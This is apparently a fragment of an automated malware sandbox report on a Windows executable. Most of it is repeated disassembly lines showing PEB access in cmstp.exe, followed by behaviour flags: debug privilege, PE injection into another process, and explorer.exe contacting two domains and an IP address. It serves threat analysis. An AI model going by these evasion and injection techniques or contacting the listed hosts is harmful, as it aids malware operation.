Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0468B8D0 mov eax, dword ptr fs:[00000030h]	7_2_0468B8D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0468B8D0 mov eax, dword ptr fs:[00000030h]	7_2_0468B8D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0468B8D0 mov eax, dword ptr fs:[00000030h]	7_2_0468B8D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C8CD6 mov eax, dword ptr fs:[00000030h]	7_2_046C8CD6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046220A0 mov eax, dword ptr fs:[00000030h]	7_2_046220A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046220A0 mov eax, dword ptr fs:[00000030h]	7_2_046220A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046220A0 mov eax, dword ptr fs:[00000030h]	7_2_046220A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046220A0 mov eax, dword ptr fs:[00000030h]	7_2_046220A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046220A0 mov eax, dword ptr fs:[00000030h]	7_2_046220A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046220A0 mov eax, dword ptr fs:[00000030h]	7_2_046220A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046390AF mov eax, dword ptr fs:[00000030h]	7_2_046390AF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462F0BF mov ecx, dword ptr fs:[00000030h]	7_2_0462F0BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462F0BF mov eax, dword ptr fs:[00000030h]	7_2_0462F0BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462F0BF mov eax, dword ptr fs:[00000030h]	7_2_0462F0BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F9080 mov eax, dword ptr fs:[00000030h]	7_2_045F9080
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04673884 mov eax, dword ptr fs:[00000030h]	7_2_04673884
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04673884 mov eax, dword ptr fs:[00000030h]	7_2_04673884
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460849B mov eax, dword ptr fs:[00000030h]	7_2_0460849B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0461C577 mov eax, dword ptr fs:[00000030h]	7_2_0461C577
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0461C577 mov eax, dword ptr fs:[00000030h]	7_2_0461C577
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04633D43 mov eax, dword ptr fs:[00000030h]	7_2_04633D43
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0461B944 mov eax, dword ptr fs:[00000030h]	7_2_0461B944
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0461B944 mov eax, dword ptr fs:[00000030h]	7_2_0461B944
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04673540 mov eax, dword ptr fs:[00000030h]	7_2_04673540
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FB171 mov eax, dword ptr fs:[00000030h]	7_2_045FB171
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FB171 mov eax, dword ptr fs:[00000030h]	7_2_045FB171
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04617D50 mov eax, dword ptr fs:[00000030h]	7_2_04617D50
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FC962 mov eax, dword ptr fs:[00000030h]	7_2_045FC962
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04614120 mov eax, dword ptr fs:[00000030h]	7_2_04614120
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04614120 mov eax, dword ptr fs:[00000030h]	7_2_04614120
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04614120 mov eax, dword ptr fs:[00000030h]	7_2_04614120
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04614120 mov eax, dword ptr fs:[00000030h]	7_2_04614120
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04614120 mov ecx, dword ptr fs:[00000030h]	7_2_04614120
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0467A537 mov eax, dword ptr fs:[00000030h]	7_2_0467A537
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046BE539 mov eax, dword ptr fs:[00000030h]	7_2_046BE539
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04603D34 mov eax, dword ptr fs:[00000030h]	7_2_04603D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04603D34 mov eax, dword ptr fs:[00000030h]	7_2_04603D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04603D34 mov eax, dword ptr fs:[00000030h]	7_2_04603D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04603D34 mov eax, dword ptr fs:[00000030h]	7_2_04603D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04603D34 mov eax, dword ptr fs:[00000030h]	7_2_04603D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04603D34 mov eax, dword ptr fs:[00000030h]	7_2_04603D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04603D34 mov eax, dword ptr fs:[00000030h]	7_2_04603D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04603D34 mov eax, dword ptr fs:[00000030h]	7_2_04603D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04603D34 mov eax, dword ptr fs:[00000030h]	7_2_04603D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04603D34 mov eax, dword ptr fs:[00000030h]	7_2_04603D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04603D34 mov eax, dword ptr fs:[00000030h]	7_2_04603D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04603D34 mov eax, dword ptr fs:[00000030h]	7_2_04603D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04603D34 mov eax, dword ptr fs:[00000030h]	7_2_04603D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C8D34 mov eax, dword ptr fs:[00000030h]	7_2_046C8D34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462513A mov eax, dword ptr fs:[00000030h]	7_2_0462513A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462513A mov eax, dword ptr fs:[00000030h]	7_2_0462513A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04624D3B mov eax, dword ptr fs:[00000030h]	7_2_04624D3B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04624D3B mov eax, dword ptr fs:[00000030h]	7_2_04624D3B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04624D3B mov eax, dword ptr fs:[00000030h]	7_2_04624D3B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F9100 mov eax, dword ptr fs:[00000030h]	7_2_045F9100
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F9100 mov eax, dword ptr fs:[00000030h]	7_2_045F9100
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F9100 mov eax, dword ptr fs:[00000030h]	7_2_045F9100
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FAD30 mov eax, dword ptr fs:[00000030h]	7_2_045FAD30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046841E8 mov eax, dword ptr fs:[00000030h]	7_2_046841E8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460D5E0 mov eax, dword ptr fs:[00000030h]	7_2_0460D5E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460D5E0 mov eax, dword ptr fs:[00000030h]	7_2_0460D5E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046BFDE2 mov eax, dword ptr fs:[00000030h]	7_2_046BFDE2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046BFDE2 mov eax, dword ptr fs:[00000030h]	7_2_046BFDE2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046BFDE2 mov eax, dword ptr fs:[00000030h]	7_2_046BFDE2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046BFDE2 mov eax, dword ptr fs:[00000030h]	7_2_046BFDE2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046A8DF1 mov eax, dword ptr fs:[00000030h]	7_2_046A8DF1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04676DC9 mov eax, dword ptr fs:[00000030h]	7_2_04676DC9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04676DC9 mov eax, dword ptr fs:[00000030h]	7_2_04676DC9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04676DC9 mov eax, dword ptr fs:[00000030h]	7_2_04676DC9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04676DC9 mov ecx, dword ptr fs:[00000030h]	7_2_04676DC9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04676DC9 mov eax, dword ptr fs:[00000030h]	7_2_04676DC9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04676DC9 mov eax, dword ptr fs:[00000030h]	7_2_04676DC9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FB1E1 mov eax, dword ptr fs:[00000030h]	7_2_045FB1E1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FB1E1 mov eax, dword ptr fs:[00000030h]	7_2_045FB1E1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FB1E1 mov eax, dword ptr fs:[00000030h]	7_2_045FB1E1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C05AC mov eax, dword ptr fs:[00000030h]	7_2_046C05AC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C05AC mov eax, dword ptr fs:[00000030h]	7_2_046C05AC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046769A6 mov eax, dword ptr fs:[00000030h]	7_2_046769A6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046261A0 mov eax, dword ptr fs:[00000030h]	7_2_046261A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046261A0 mov eax, dword ptr fs:[00000030h]	7_2_046261A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046235A1 mov eax, dword ptr fs:[00000030h]	7_2_046235A1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F2D8A mov eax, dword ptr fs:[00000030h]	7_2_045F2D8A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F2D8A mov eax, dword ptr fs:[00000030h]	7_2_045F2D8A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F2D8A mov eax, dword ptr fs:[00000030h]	7_2_045F2D8A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F2D8A mov eax, dword ptr fs:[00000030h]	7_2_045F2D8A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F2D8A mov eax, dword ptr fs:[00000030h]	7_2_045F2D8A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04621DB5 mov eax, dword ptr fs:[00000030h]	7_2_04621DB5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04621DB5 mov eax, dword ptr fs:[00000030h]	7_2_04621DB5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04621DB5 mov eax, dword ptr fs:[00000030h]	7_2_04621DB5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046751BE mov eax, dword ptr fs:[00000030h]	7_2_046751BE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046751BE mov eax, dword ptr fs:[00000030h]	7_2_046751BE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046751BE mov eax, dword ptr fs:[00000030h]	7_2_046751BE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046751BE mov eax, dword ptr fs:[00000030h]	7_2_046751BE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0461C182 mov eax, dword ptr fs:[00000030h]	7_2_0461C182
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04622581 mov eax, dword ptr fs:[00000030h]	7_2_04622581
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04622581 mov eax, dword ptr fs:[00000030h]	7_2_04622581
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04622581 mov eax, dword ptr fs:[00000030h]	7_2_04622581
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04622581 mov eax, dword ptr fs:[00000030h]	7_2_04622581
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462A185 mov eax, dword ptr fs:[00000030h]	7_2_0462A185
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04622990 mov eax, dword ptr fs:[00000030h]	7_2_04622990
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462FD9B mov eax, dword ptr fs:[00000030h]	7_2_0462FD9B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462FD9B mov eax, dword ptr fs:[00000030h]	7_2_0462FD9B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046AB260 mov eax, dword ptr fs:[00000030h]	7_2_046AB260
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046AB260 mov eax, dword ptr fs:[00000030h]	7_2_046AB260
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460766D mov eax, dword ptr fs:[00000030h]	7_2_0460766D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C8A62 mov eax, dword ptr fs:[00000030h]	7_2_046C8A62
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0461AE73 mov eax, dword ptr fs:[00000030h]	7_2_0461AE73
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0461AE73 mov eax, dword ptr fs:[00000030h]	7_2_0461AE73
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0461AE73 mov eax, dword ptr fs:[00000030h]	7_2_0461AE73
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0461AE73 mov eax, dword ptr fs:[00000030h]	7_2_0461AE73
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0461AE73 mov eax, dword ptr fs:[00000030h]	7_2_0461AE73
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0463927A mov eax, dword ptr fs:[00000030h]	7_2_0463927A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F9240 mov eax, dword ptr fs:[00000030h]	7_2_045F9240
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F9240 mov eax, dword ptr fs:[00000030h]	7_2_045F9240
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F9240 mov eax, dword ptr fs:[00000030h]	7_2_045F9240
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F9240 mov eax, dword ptr fs:[00000030h]	7_2_045F9240
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04607E41 mov eax, dword ptr fs:[00000030h]	7_2_04607E41
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04607E41 mov eax, dword ptr fs:[00000030h]	7_2_04607E41
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04607E41 mov eax, dword ptr fs:[00000030h]	7_2_04607E41
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04607E41 mov eax, dword ptr fs:[00000030h]	7_2_04607E41
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04607E41 mov eax, dword ptr fs:[00000030h]	7_2_04607E41
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04607E41 mov eax, dword ptr fs:[00000030h]	7_2_04607E41
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046BAE44 mov eax, dword ptr fs:[00000030h]	7_2_046BAE44
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046BAE44 mov eax, dword ptr fs:[00000030h]	7_2_046BAE44
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046BEA55 mov eax, dword ptr fs:[00000030h]	7_2_046BEA55
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04684257 mov eax, dword ptr fs:[00000030h]	7_2_04684257
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FAA16 mov eax, dword ptr fs:[00000030h]	7_2_045FAA16
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FAA16 mov eax, dword ptr fs:[00000030h]	7_2_045FAA16
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04634A2C mov eax, dword ptr fs:[00000030h]	7_2_04634A2C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04634A2C mov eax, dword ptr fs:[00000030h]	7_2_04634A2C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F5210 mov eax, dword ptr fs:[00000030h]	7_2_045F5210
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F5210 mov ecx, dword ptr fs:[00000030h]	7_2_045F5210
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F5210 mov eax, dword ptr fs:[00000030h]	7_2_045F5210
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F5210 mov eax, dword ptr fs:[00000030h]	7_2_045F5210
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046AFE3F mov eax, dword ptr fs:[00000030h]	7_2_046AFE3F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FC600 mov eax, dword ptr fs:[00000030h]	7_2_045FC600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FC600 mov eax, dword ptr fs:[00000030h]	7_2_045FC600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FC600 mov eax, dword ptr fs:[00000030h]	7_2_045FC600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04628E00 mov eax, dword ptr fs:[00000030h]	7_2_04628E00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B1608 mov eax, dword ptr fs:[00000030h]	7_2_046B1608
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04608A0A mov eax, dword ptr fs:[00000030h]	7_2_04608A0A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04613A1C mov eax, dword ptr fs:[00000030h]	7_2_04613A1C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462A61C mov eax, dword ptr fs:[00000030h]	7_2_0462A61C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462A61C mov eax, dword ptr fs:[00000030h]	7_2_0462A61C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FE620 mov eax, dword ptr fs:[00000030h]	7_2_045FE620
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046216E0 mov ecx, dword ptr fs:[00000030h]	7_2_046216E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046076E2 mov eax, dword ptr fs:[00000030h]	7_2_046076E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04622AE4 mov eax, dword ptr fs:[00000030h]	7_2_04622AE4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04638EC7 mov eax, dword ptr fs:[00000030h]	7_2_04638EC7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04622ACB mov eax, dword ptr fs:[00000030h]	7_2_04622ACB
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046AFEC0 mov eax, dword ptr fs:[00000030h]	7_2_046AFEC0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046236CC mov eax, dword ptr fs:[00000030h]	7_2_046236CC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C8ED6 mov eax, dword ptr fs:[00000030h]	7_2_046C8ED6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046746A7 mov eax, dword ptr fs:[00000030h]	7_2_046746A7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C0EA5 mov eax, dword ptr fs:[00000030h]	7_2_046C0EA5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C0EA5 mov eax, dword ptr fs:[00000030h]	7_2_046C0EA5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C0EA5 mov eax, dword ptr fs:[00000030h]	7_2_046C0EA5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460AAB0 mov eax, dword ptr fs:[00000030h]	7_2_0460AAB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460AAB0 mov eax, dword ptr fs:[00000030h]	7_2_0460AAB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462FAB0 mov eax, dword ptr fs:[00000030h]	7_2_0462FAB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0468FE87 mov eax, dword ptr fs:[00000030h]	7_2_0468FE87
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462D294 mov eax, dword ptr fs:[00000030h]	7_2_0462D294
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462D294 mov eax, dword ptr fs:[00000030h]	7_2_0462D294
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F52A5 mov eax, dword ptr fs:[00000030h]	7_2_045F52A5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F52A5 mov eax, dword ptr fs:[00000030h]	7_2_045F52A5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F52A5 mov eax, dword ptr fs:[00000030h]	7_2_045F52A5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F52A5 mov eax, dword ptr fs:[00000030h]	7_2_045F52A5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F52A5 mov eax, dword ptr fs:[00000030h]	7_2_045F52A5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460FF60 mov eax, dword ptr fs:[00000030h]	7_2_0460FF60
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C8F6A mov eax, dword ptr fs:[00000030h]	7_2_046C8F6A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FF358 mov eax, dword ptr fs:[00000030h]	7_2_045FF358
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04623B7A mov eax, dword ptr fs:[00000030h]	7_2_04623B7A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04623B7A mov eax, dword ptr fs:[00000030h]	7_2_04623B7A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FDB40 mov eax, dword ptr fs:[00000030h]	7_2_045FDB40
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0460EF40 mov eax, dword ptr fs:[00000030h]	7_2_0460EF40
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C8B58 mov eax, dword ptr fs:[00000030h]	7_2_046C8B58
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045FDB60 mov ecx, dword ptr fs:[00000030h]	7_2_045FDB60
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462E730 mov eax, dword ptr fs:[00000030h]	7_2_0462E730
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C070D mov eax, dword ptr fs:[00000030h]	7_2_046C070D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C070D mov eax, dword ptr fs:[00000030h]	7_2_046C070D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462A70E mov eax, dword ptr fs:[00000030h]	7_2_0462A70E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462A70E mov eax, dword ptr fs:[00000030h]	7_2_0462A70E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B131B mov eax, dword ptr fs:[00000030h]	7_2_046B131B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F4F2E mov eax, dword ptr fs:[00000030h]	7_2_045F4F2E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_045F4F2E mov eax, dword ptr fs:[00000030h]	7_2_045F4F2E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0461F716 mov eax, dword ptr fs:[00000030h]	7_2_0461F716
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0468FF10 mov eax, dword ptr fs:[00000030h]	7_2_0468FF10
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0468FF10 mov eax, dword ptr fs:[00000030h]	7_2_0468FF10
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046203E2 mov eax, dword ptr fs:[00000030h]	7_2_046203E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046203E2 mov eax, dword ptr fs:[00000030h]	7_2_046203E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046203E2 mov eax, dword ptr fs:[00000030h]	7_2_046203E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046203E2 mov eax, dword ptr fs:[00000030h]	7_2_046203E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046203E2 mov eax, dword ptr fs:[00000030h]	7_2_046203E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046203E2 mov eax, dword ptr fs:[00000030h]	7_2_046203E2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0461DBE9 mov eax, dword ptr fs:[00000030h]	7_2_0461DBE9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046337F5 mov eax, dword ptr fs:[00000030h]	7_2_046337F5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046753CA mov eax, dword ptr fs:[00000030h]	7_2_046753CA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046753CA mov eax, dword ptr fs:[00000030h]	7_2_046753CA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046C5BA5 mov eax, dword ptr fs:[00000030h]	7_2_046C5BA5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04624BAD mov eax, dword ptr fs:[00000030h]	7_2_04624BAD
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04624BAD mov eax, dword ptr fs:[00000030h]	7_2_04624BAD
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04624BAD mov eax, dword ptr fs:[00000030h]	7_2_04624BAD
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046B138A mov eax, dword ptr fs:[00000030h]	7_2_046B138A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_046AD380 mov ecx, dword ptr fs:[00000030h]	7_2_046AD380
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04601B8F mov eax, dword ptr fs:[00000030h]	7_2_04601B8F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04601B8F mov eax, dword ptr fs:[00000030h]	7_2_04601B8F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_0462B390 mov eax, dword ptr fs:[00000030h]	7_2_0462B390
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04677794 mov eax, dword ptr fs:[00000030h]	7_2_04677794
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04677794 mov eax, dword ptr fs:[00000030h]	7_2_04677794
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04677794 mov eax, dword ptr fs:[00000030h]	7_2_04677794
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04608794 mov eax, dword ptr fs:[00000030h]	7_2_04608794
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 7_2_04622397 mov eax, dword ptr fs:[00000030h]	7_2_04622397

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.kompramania.com
Source: C:\Windows\explorer.exe	Domain query: www.findinkjams.com
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

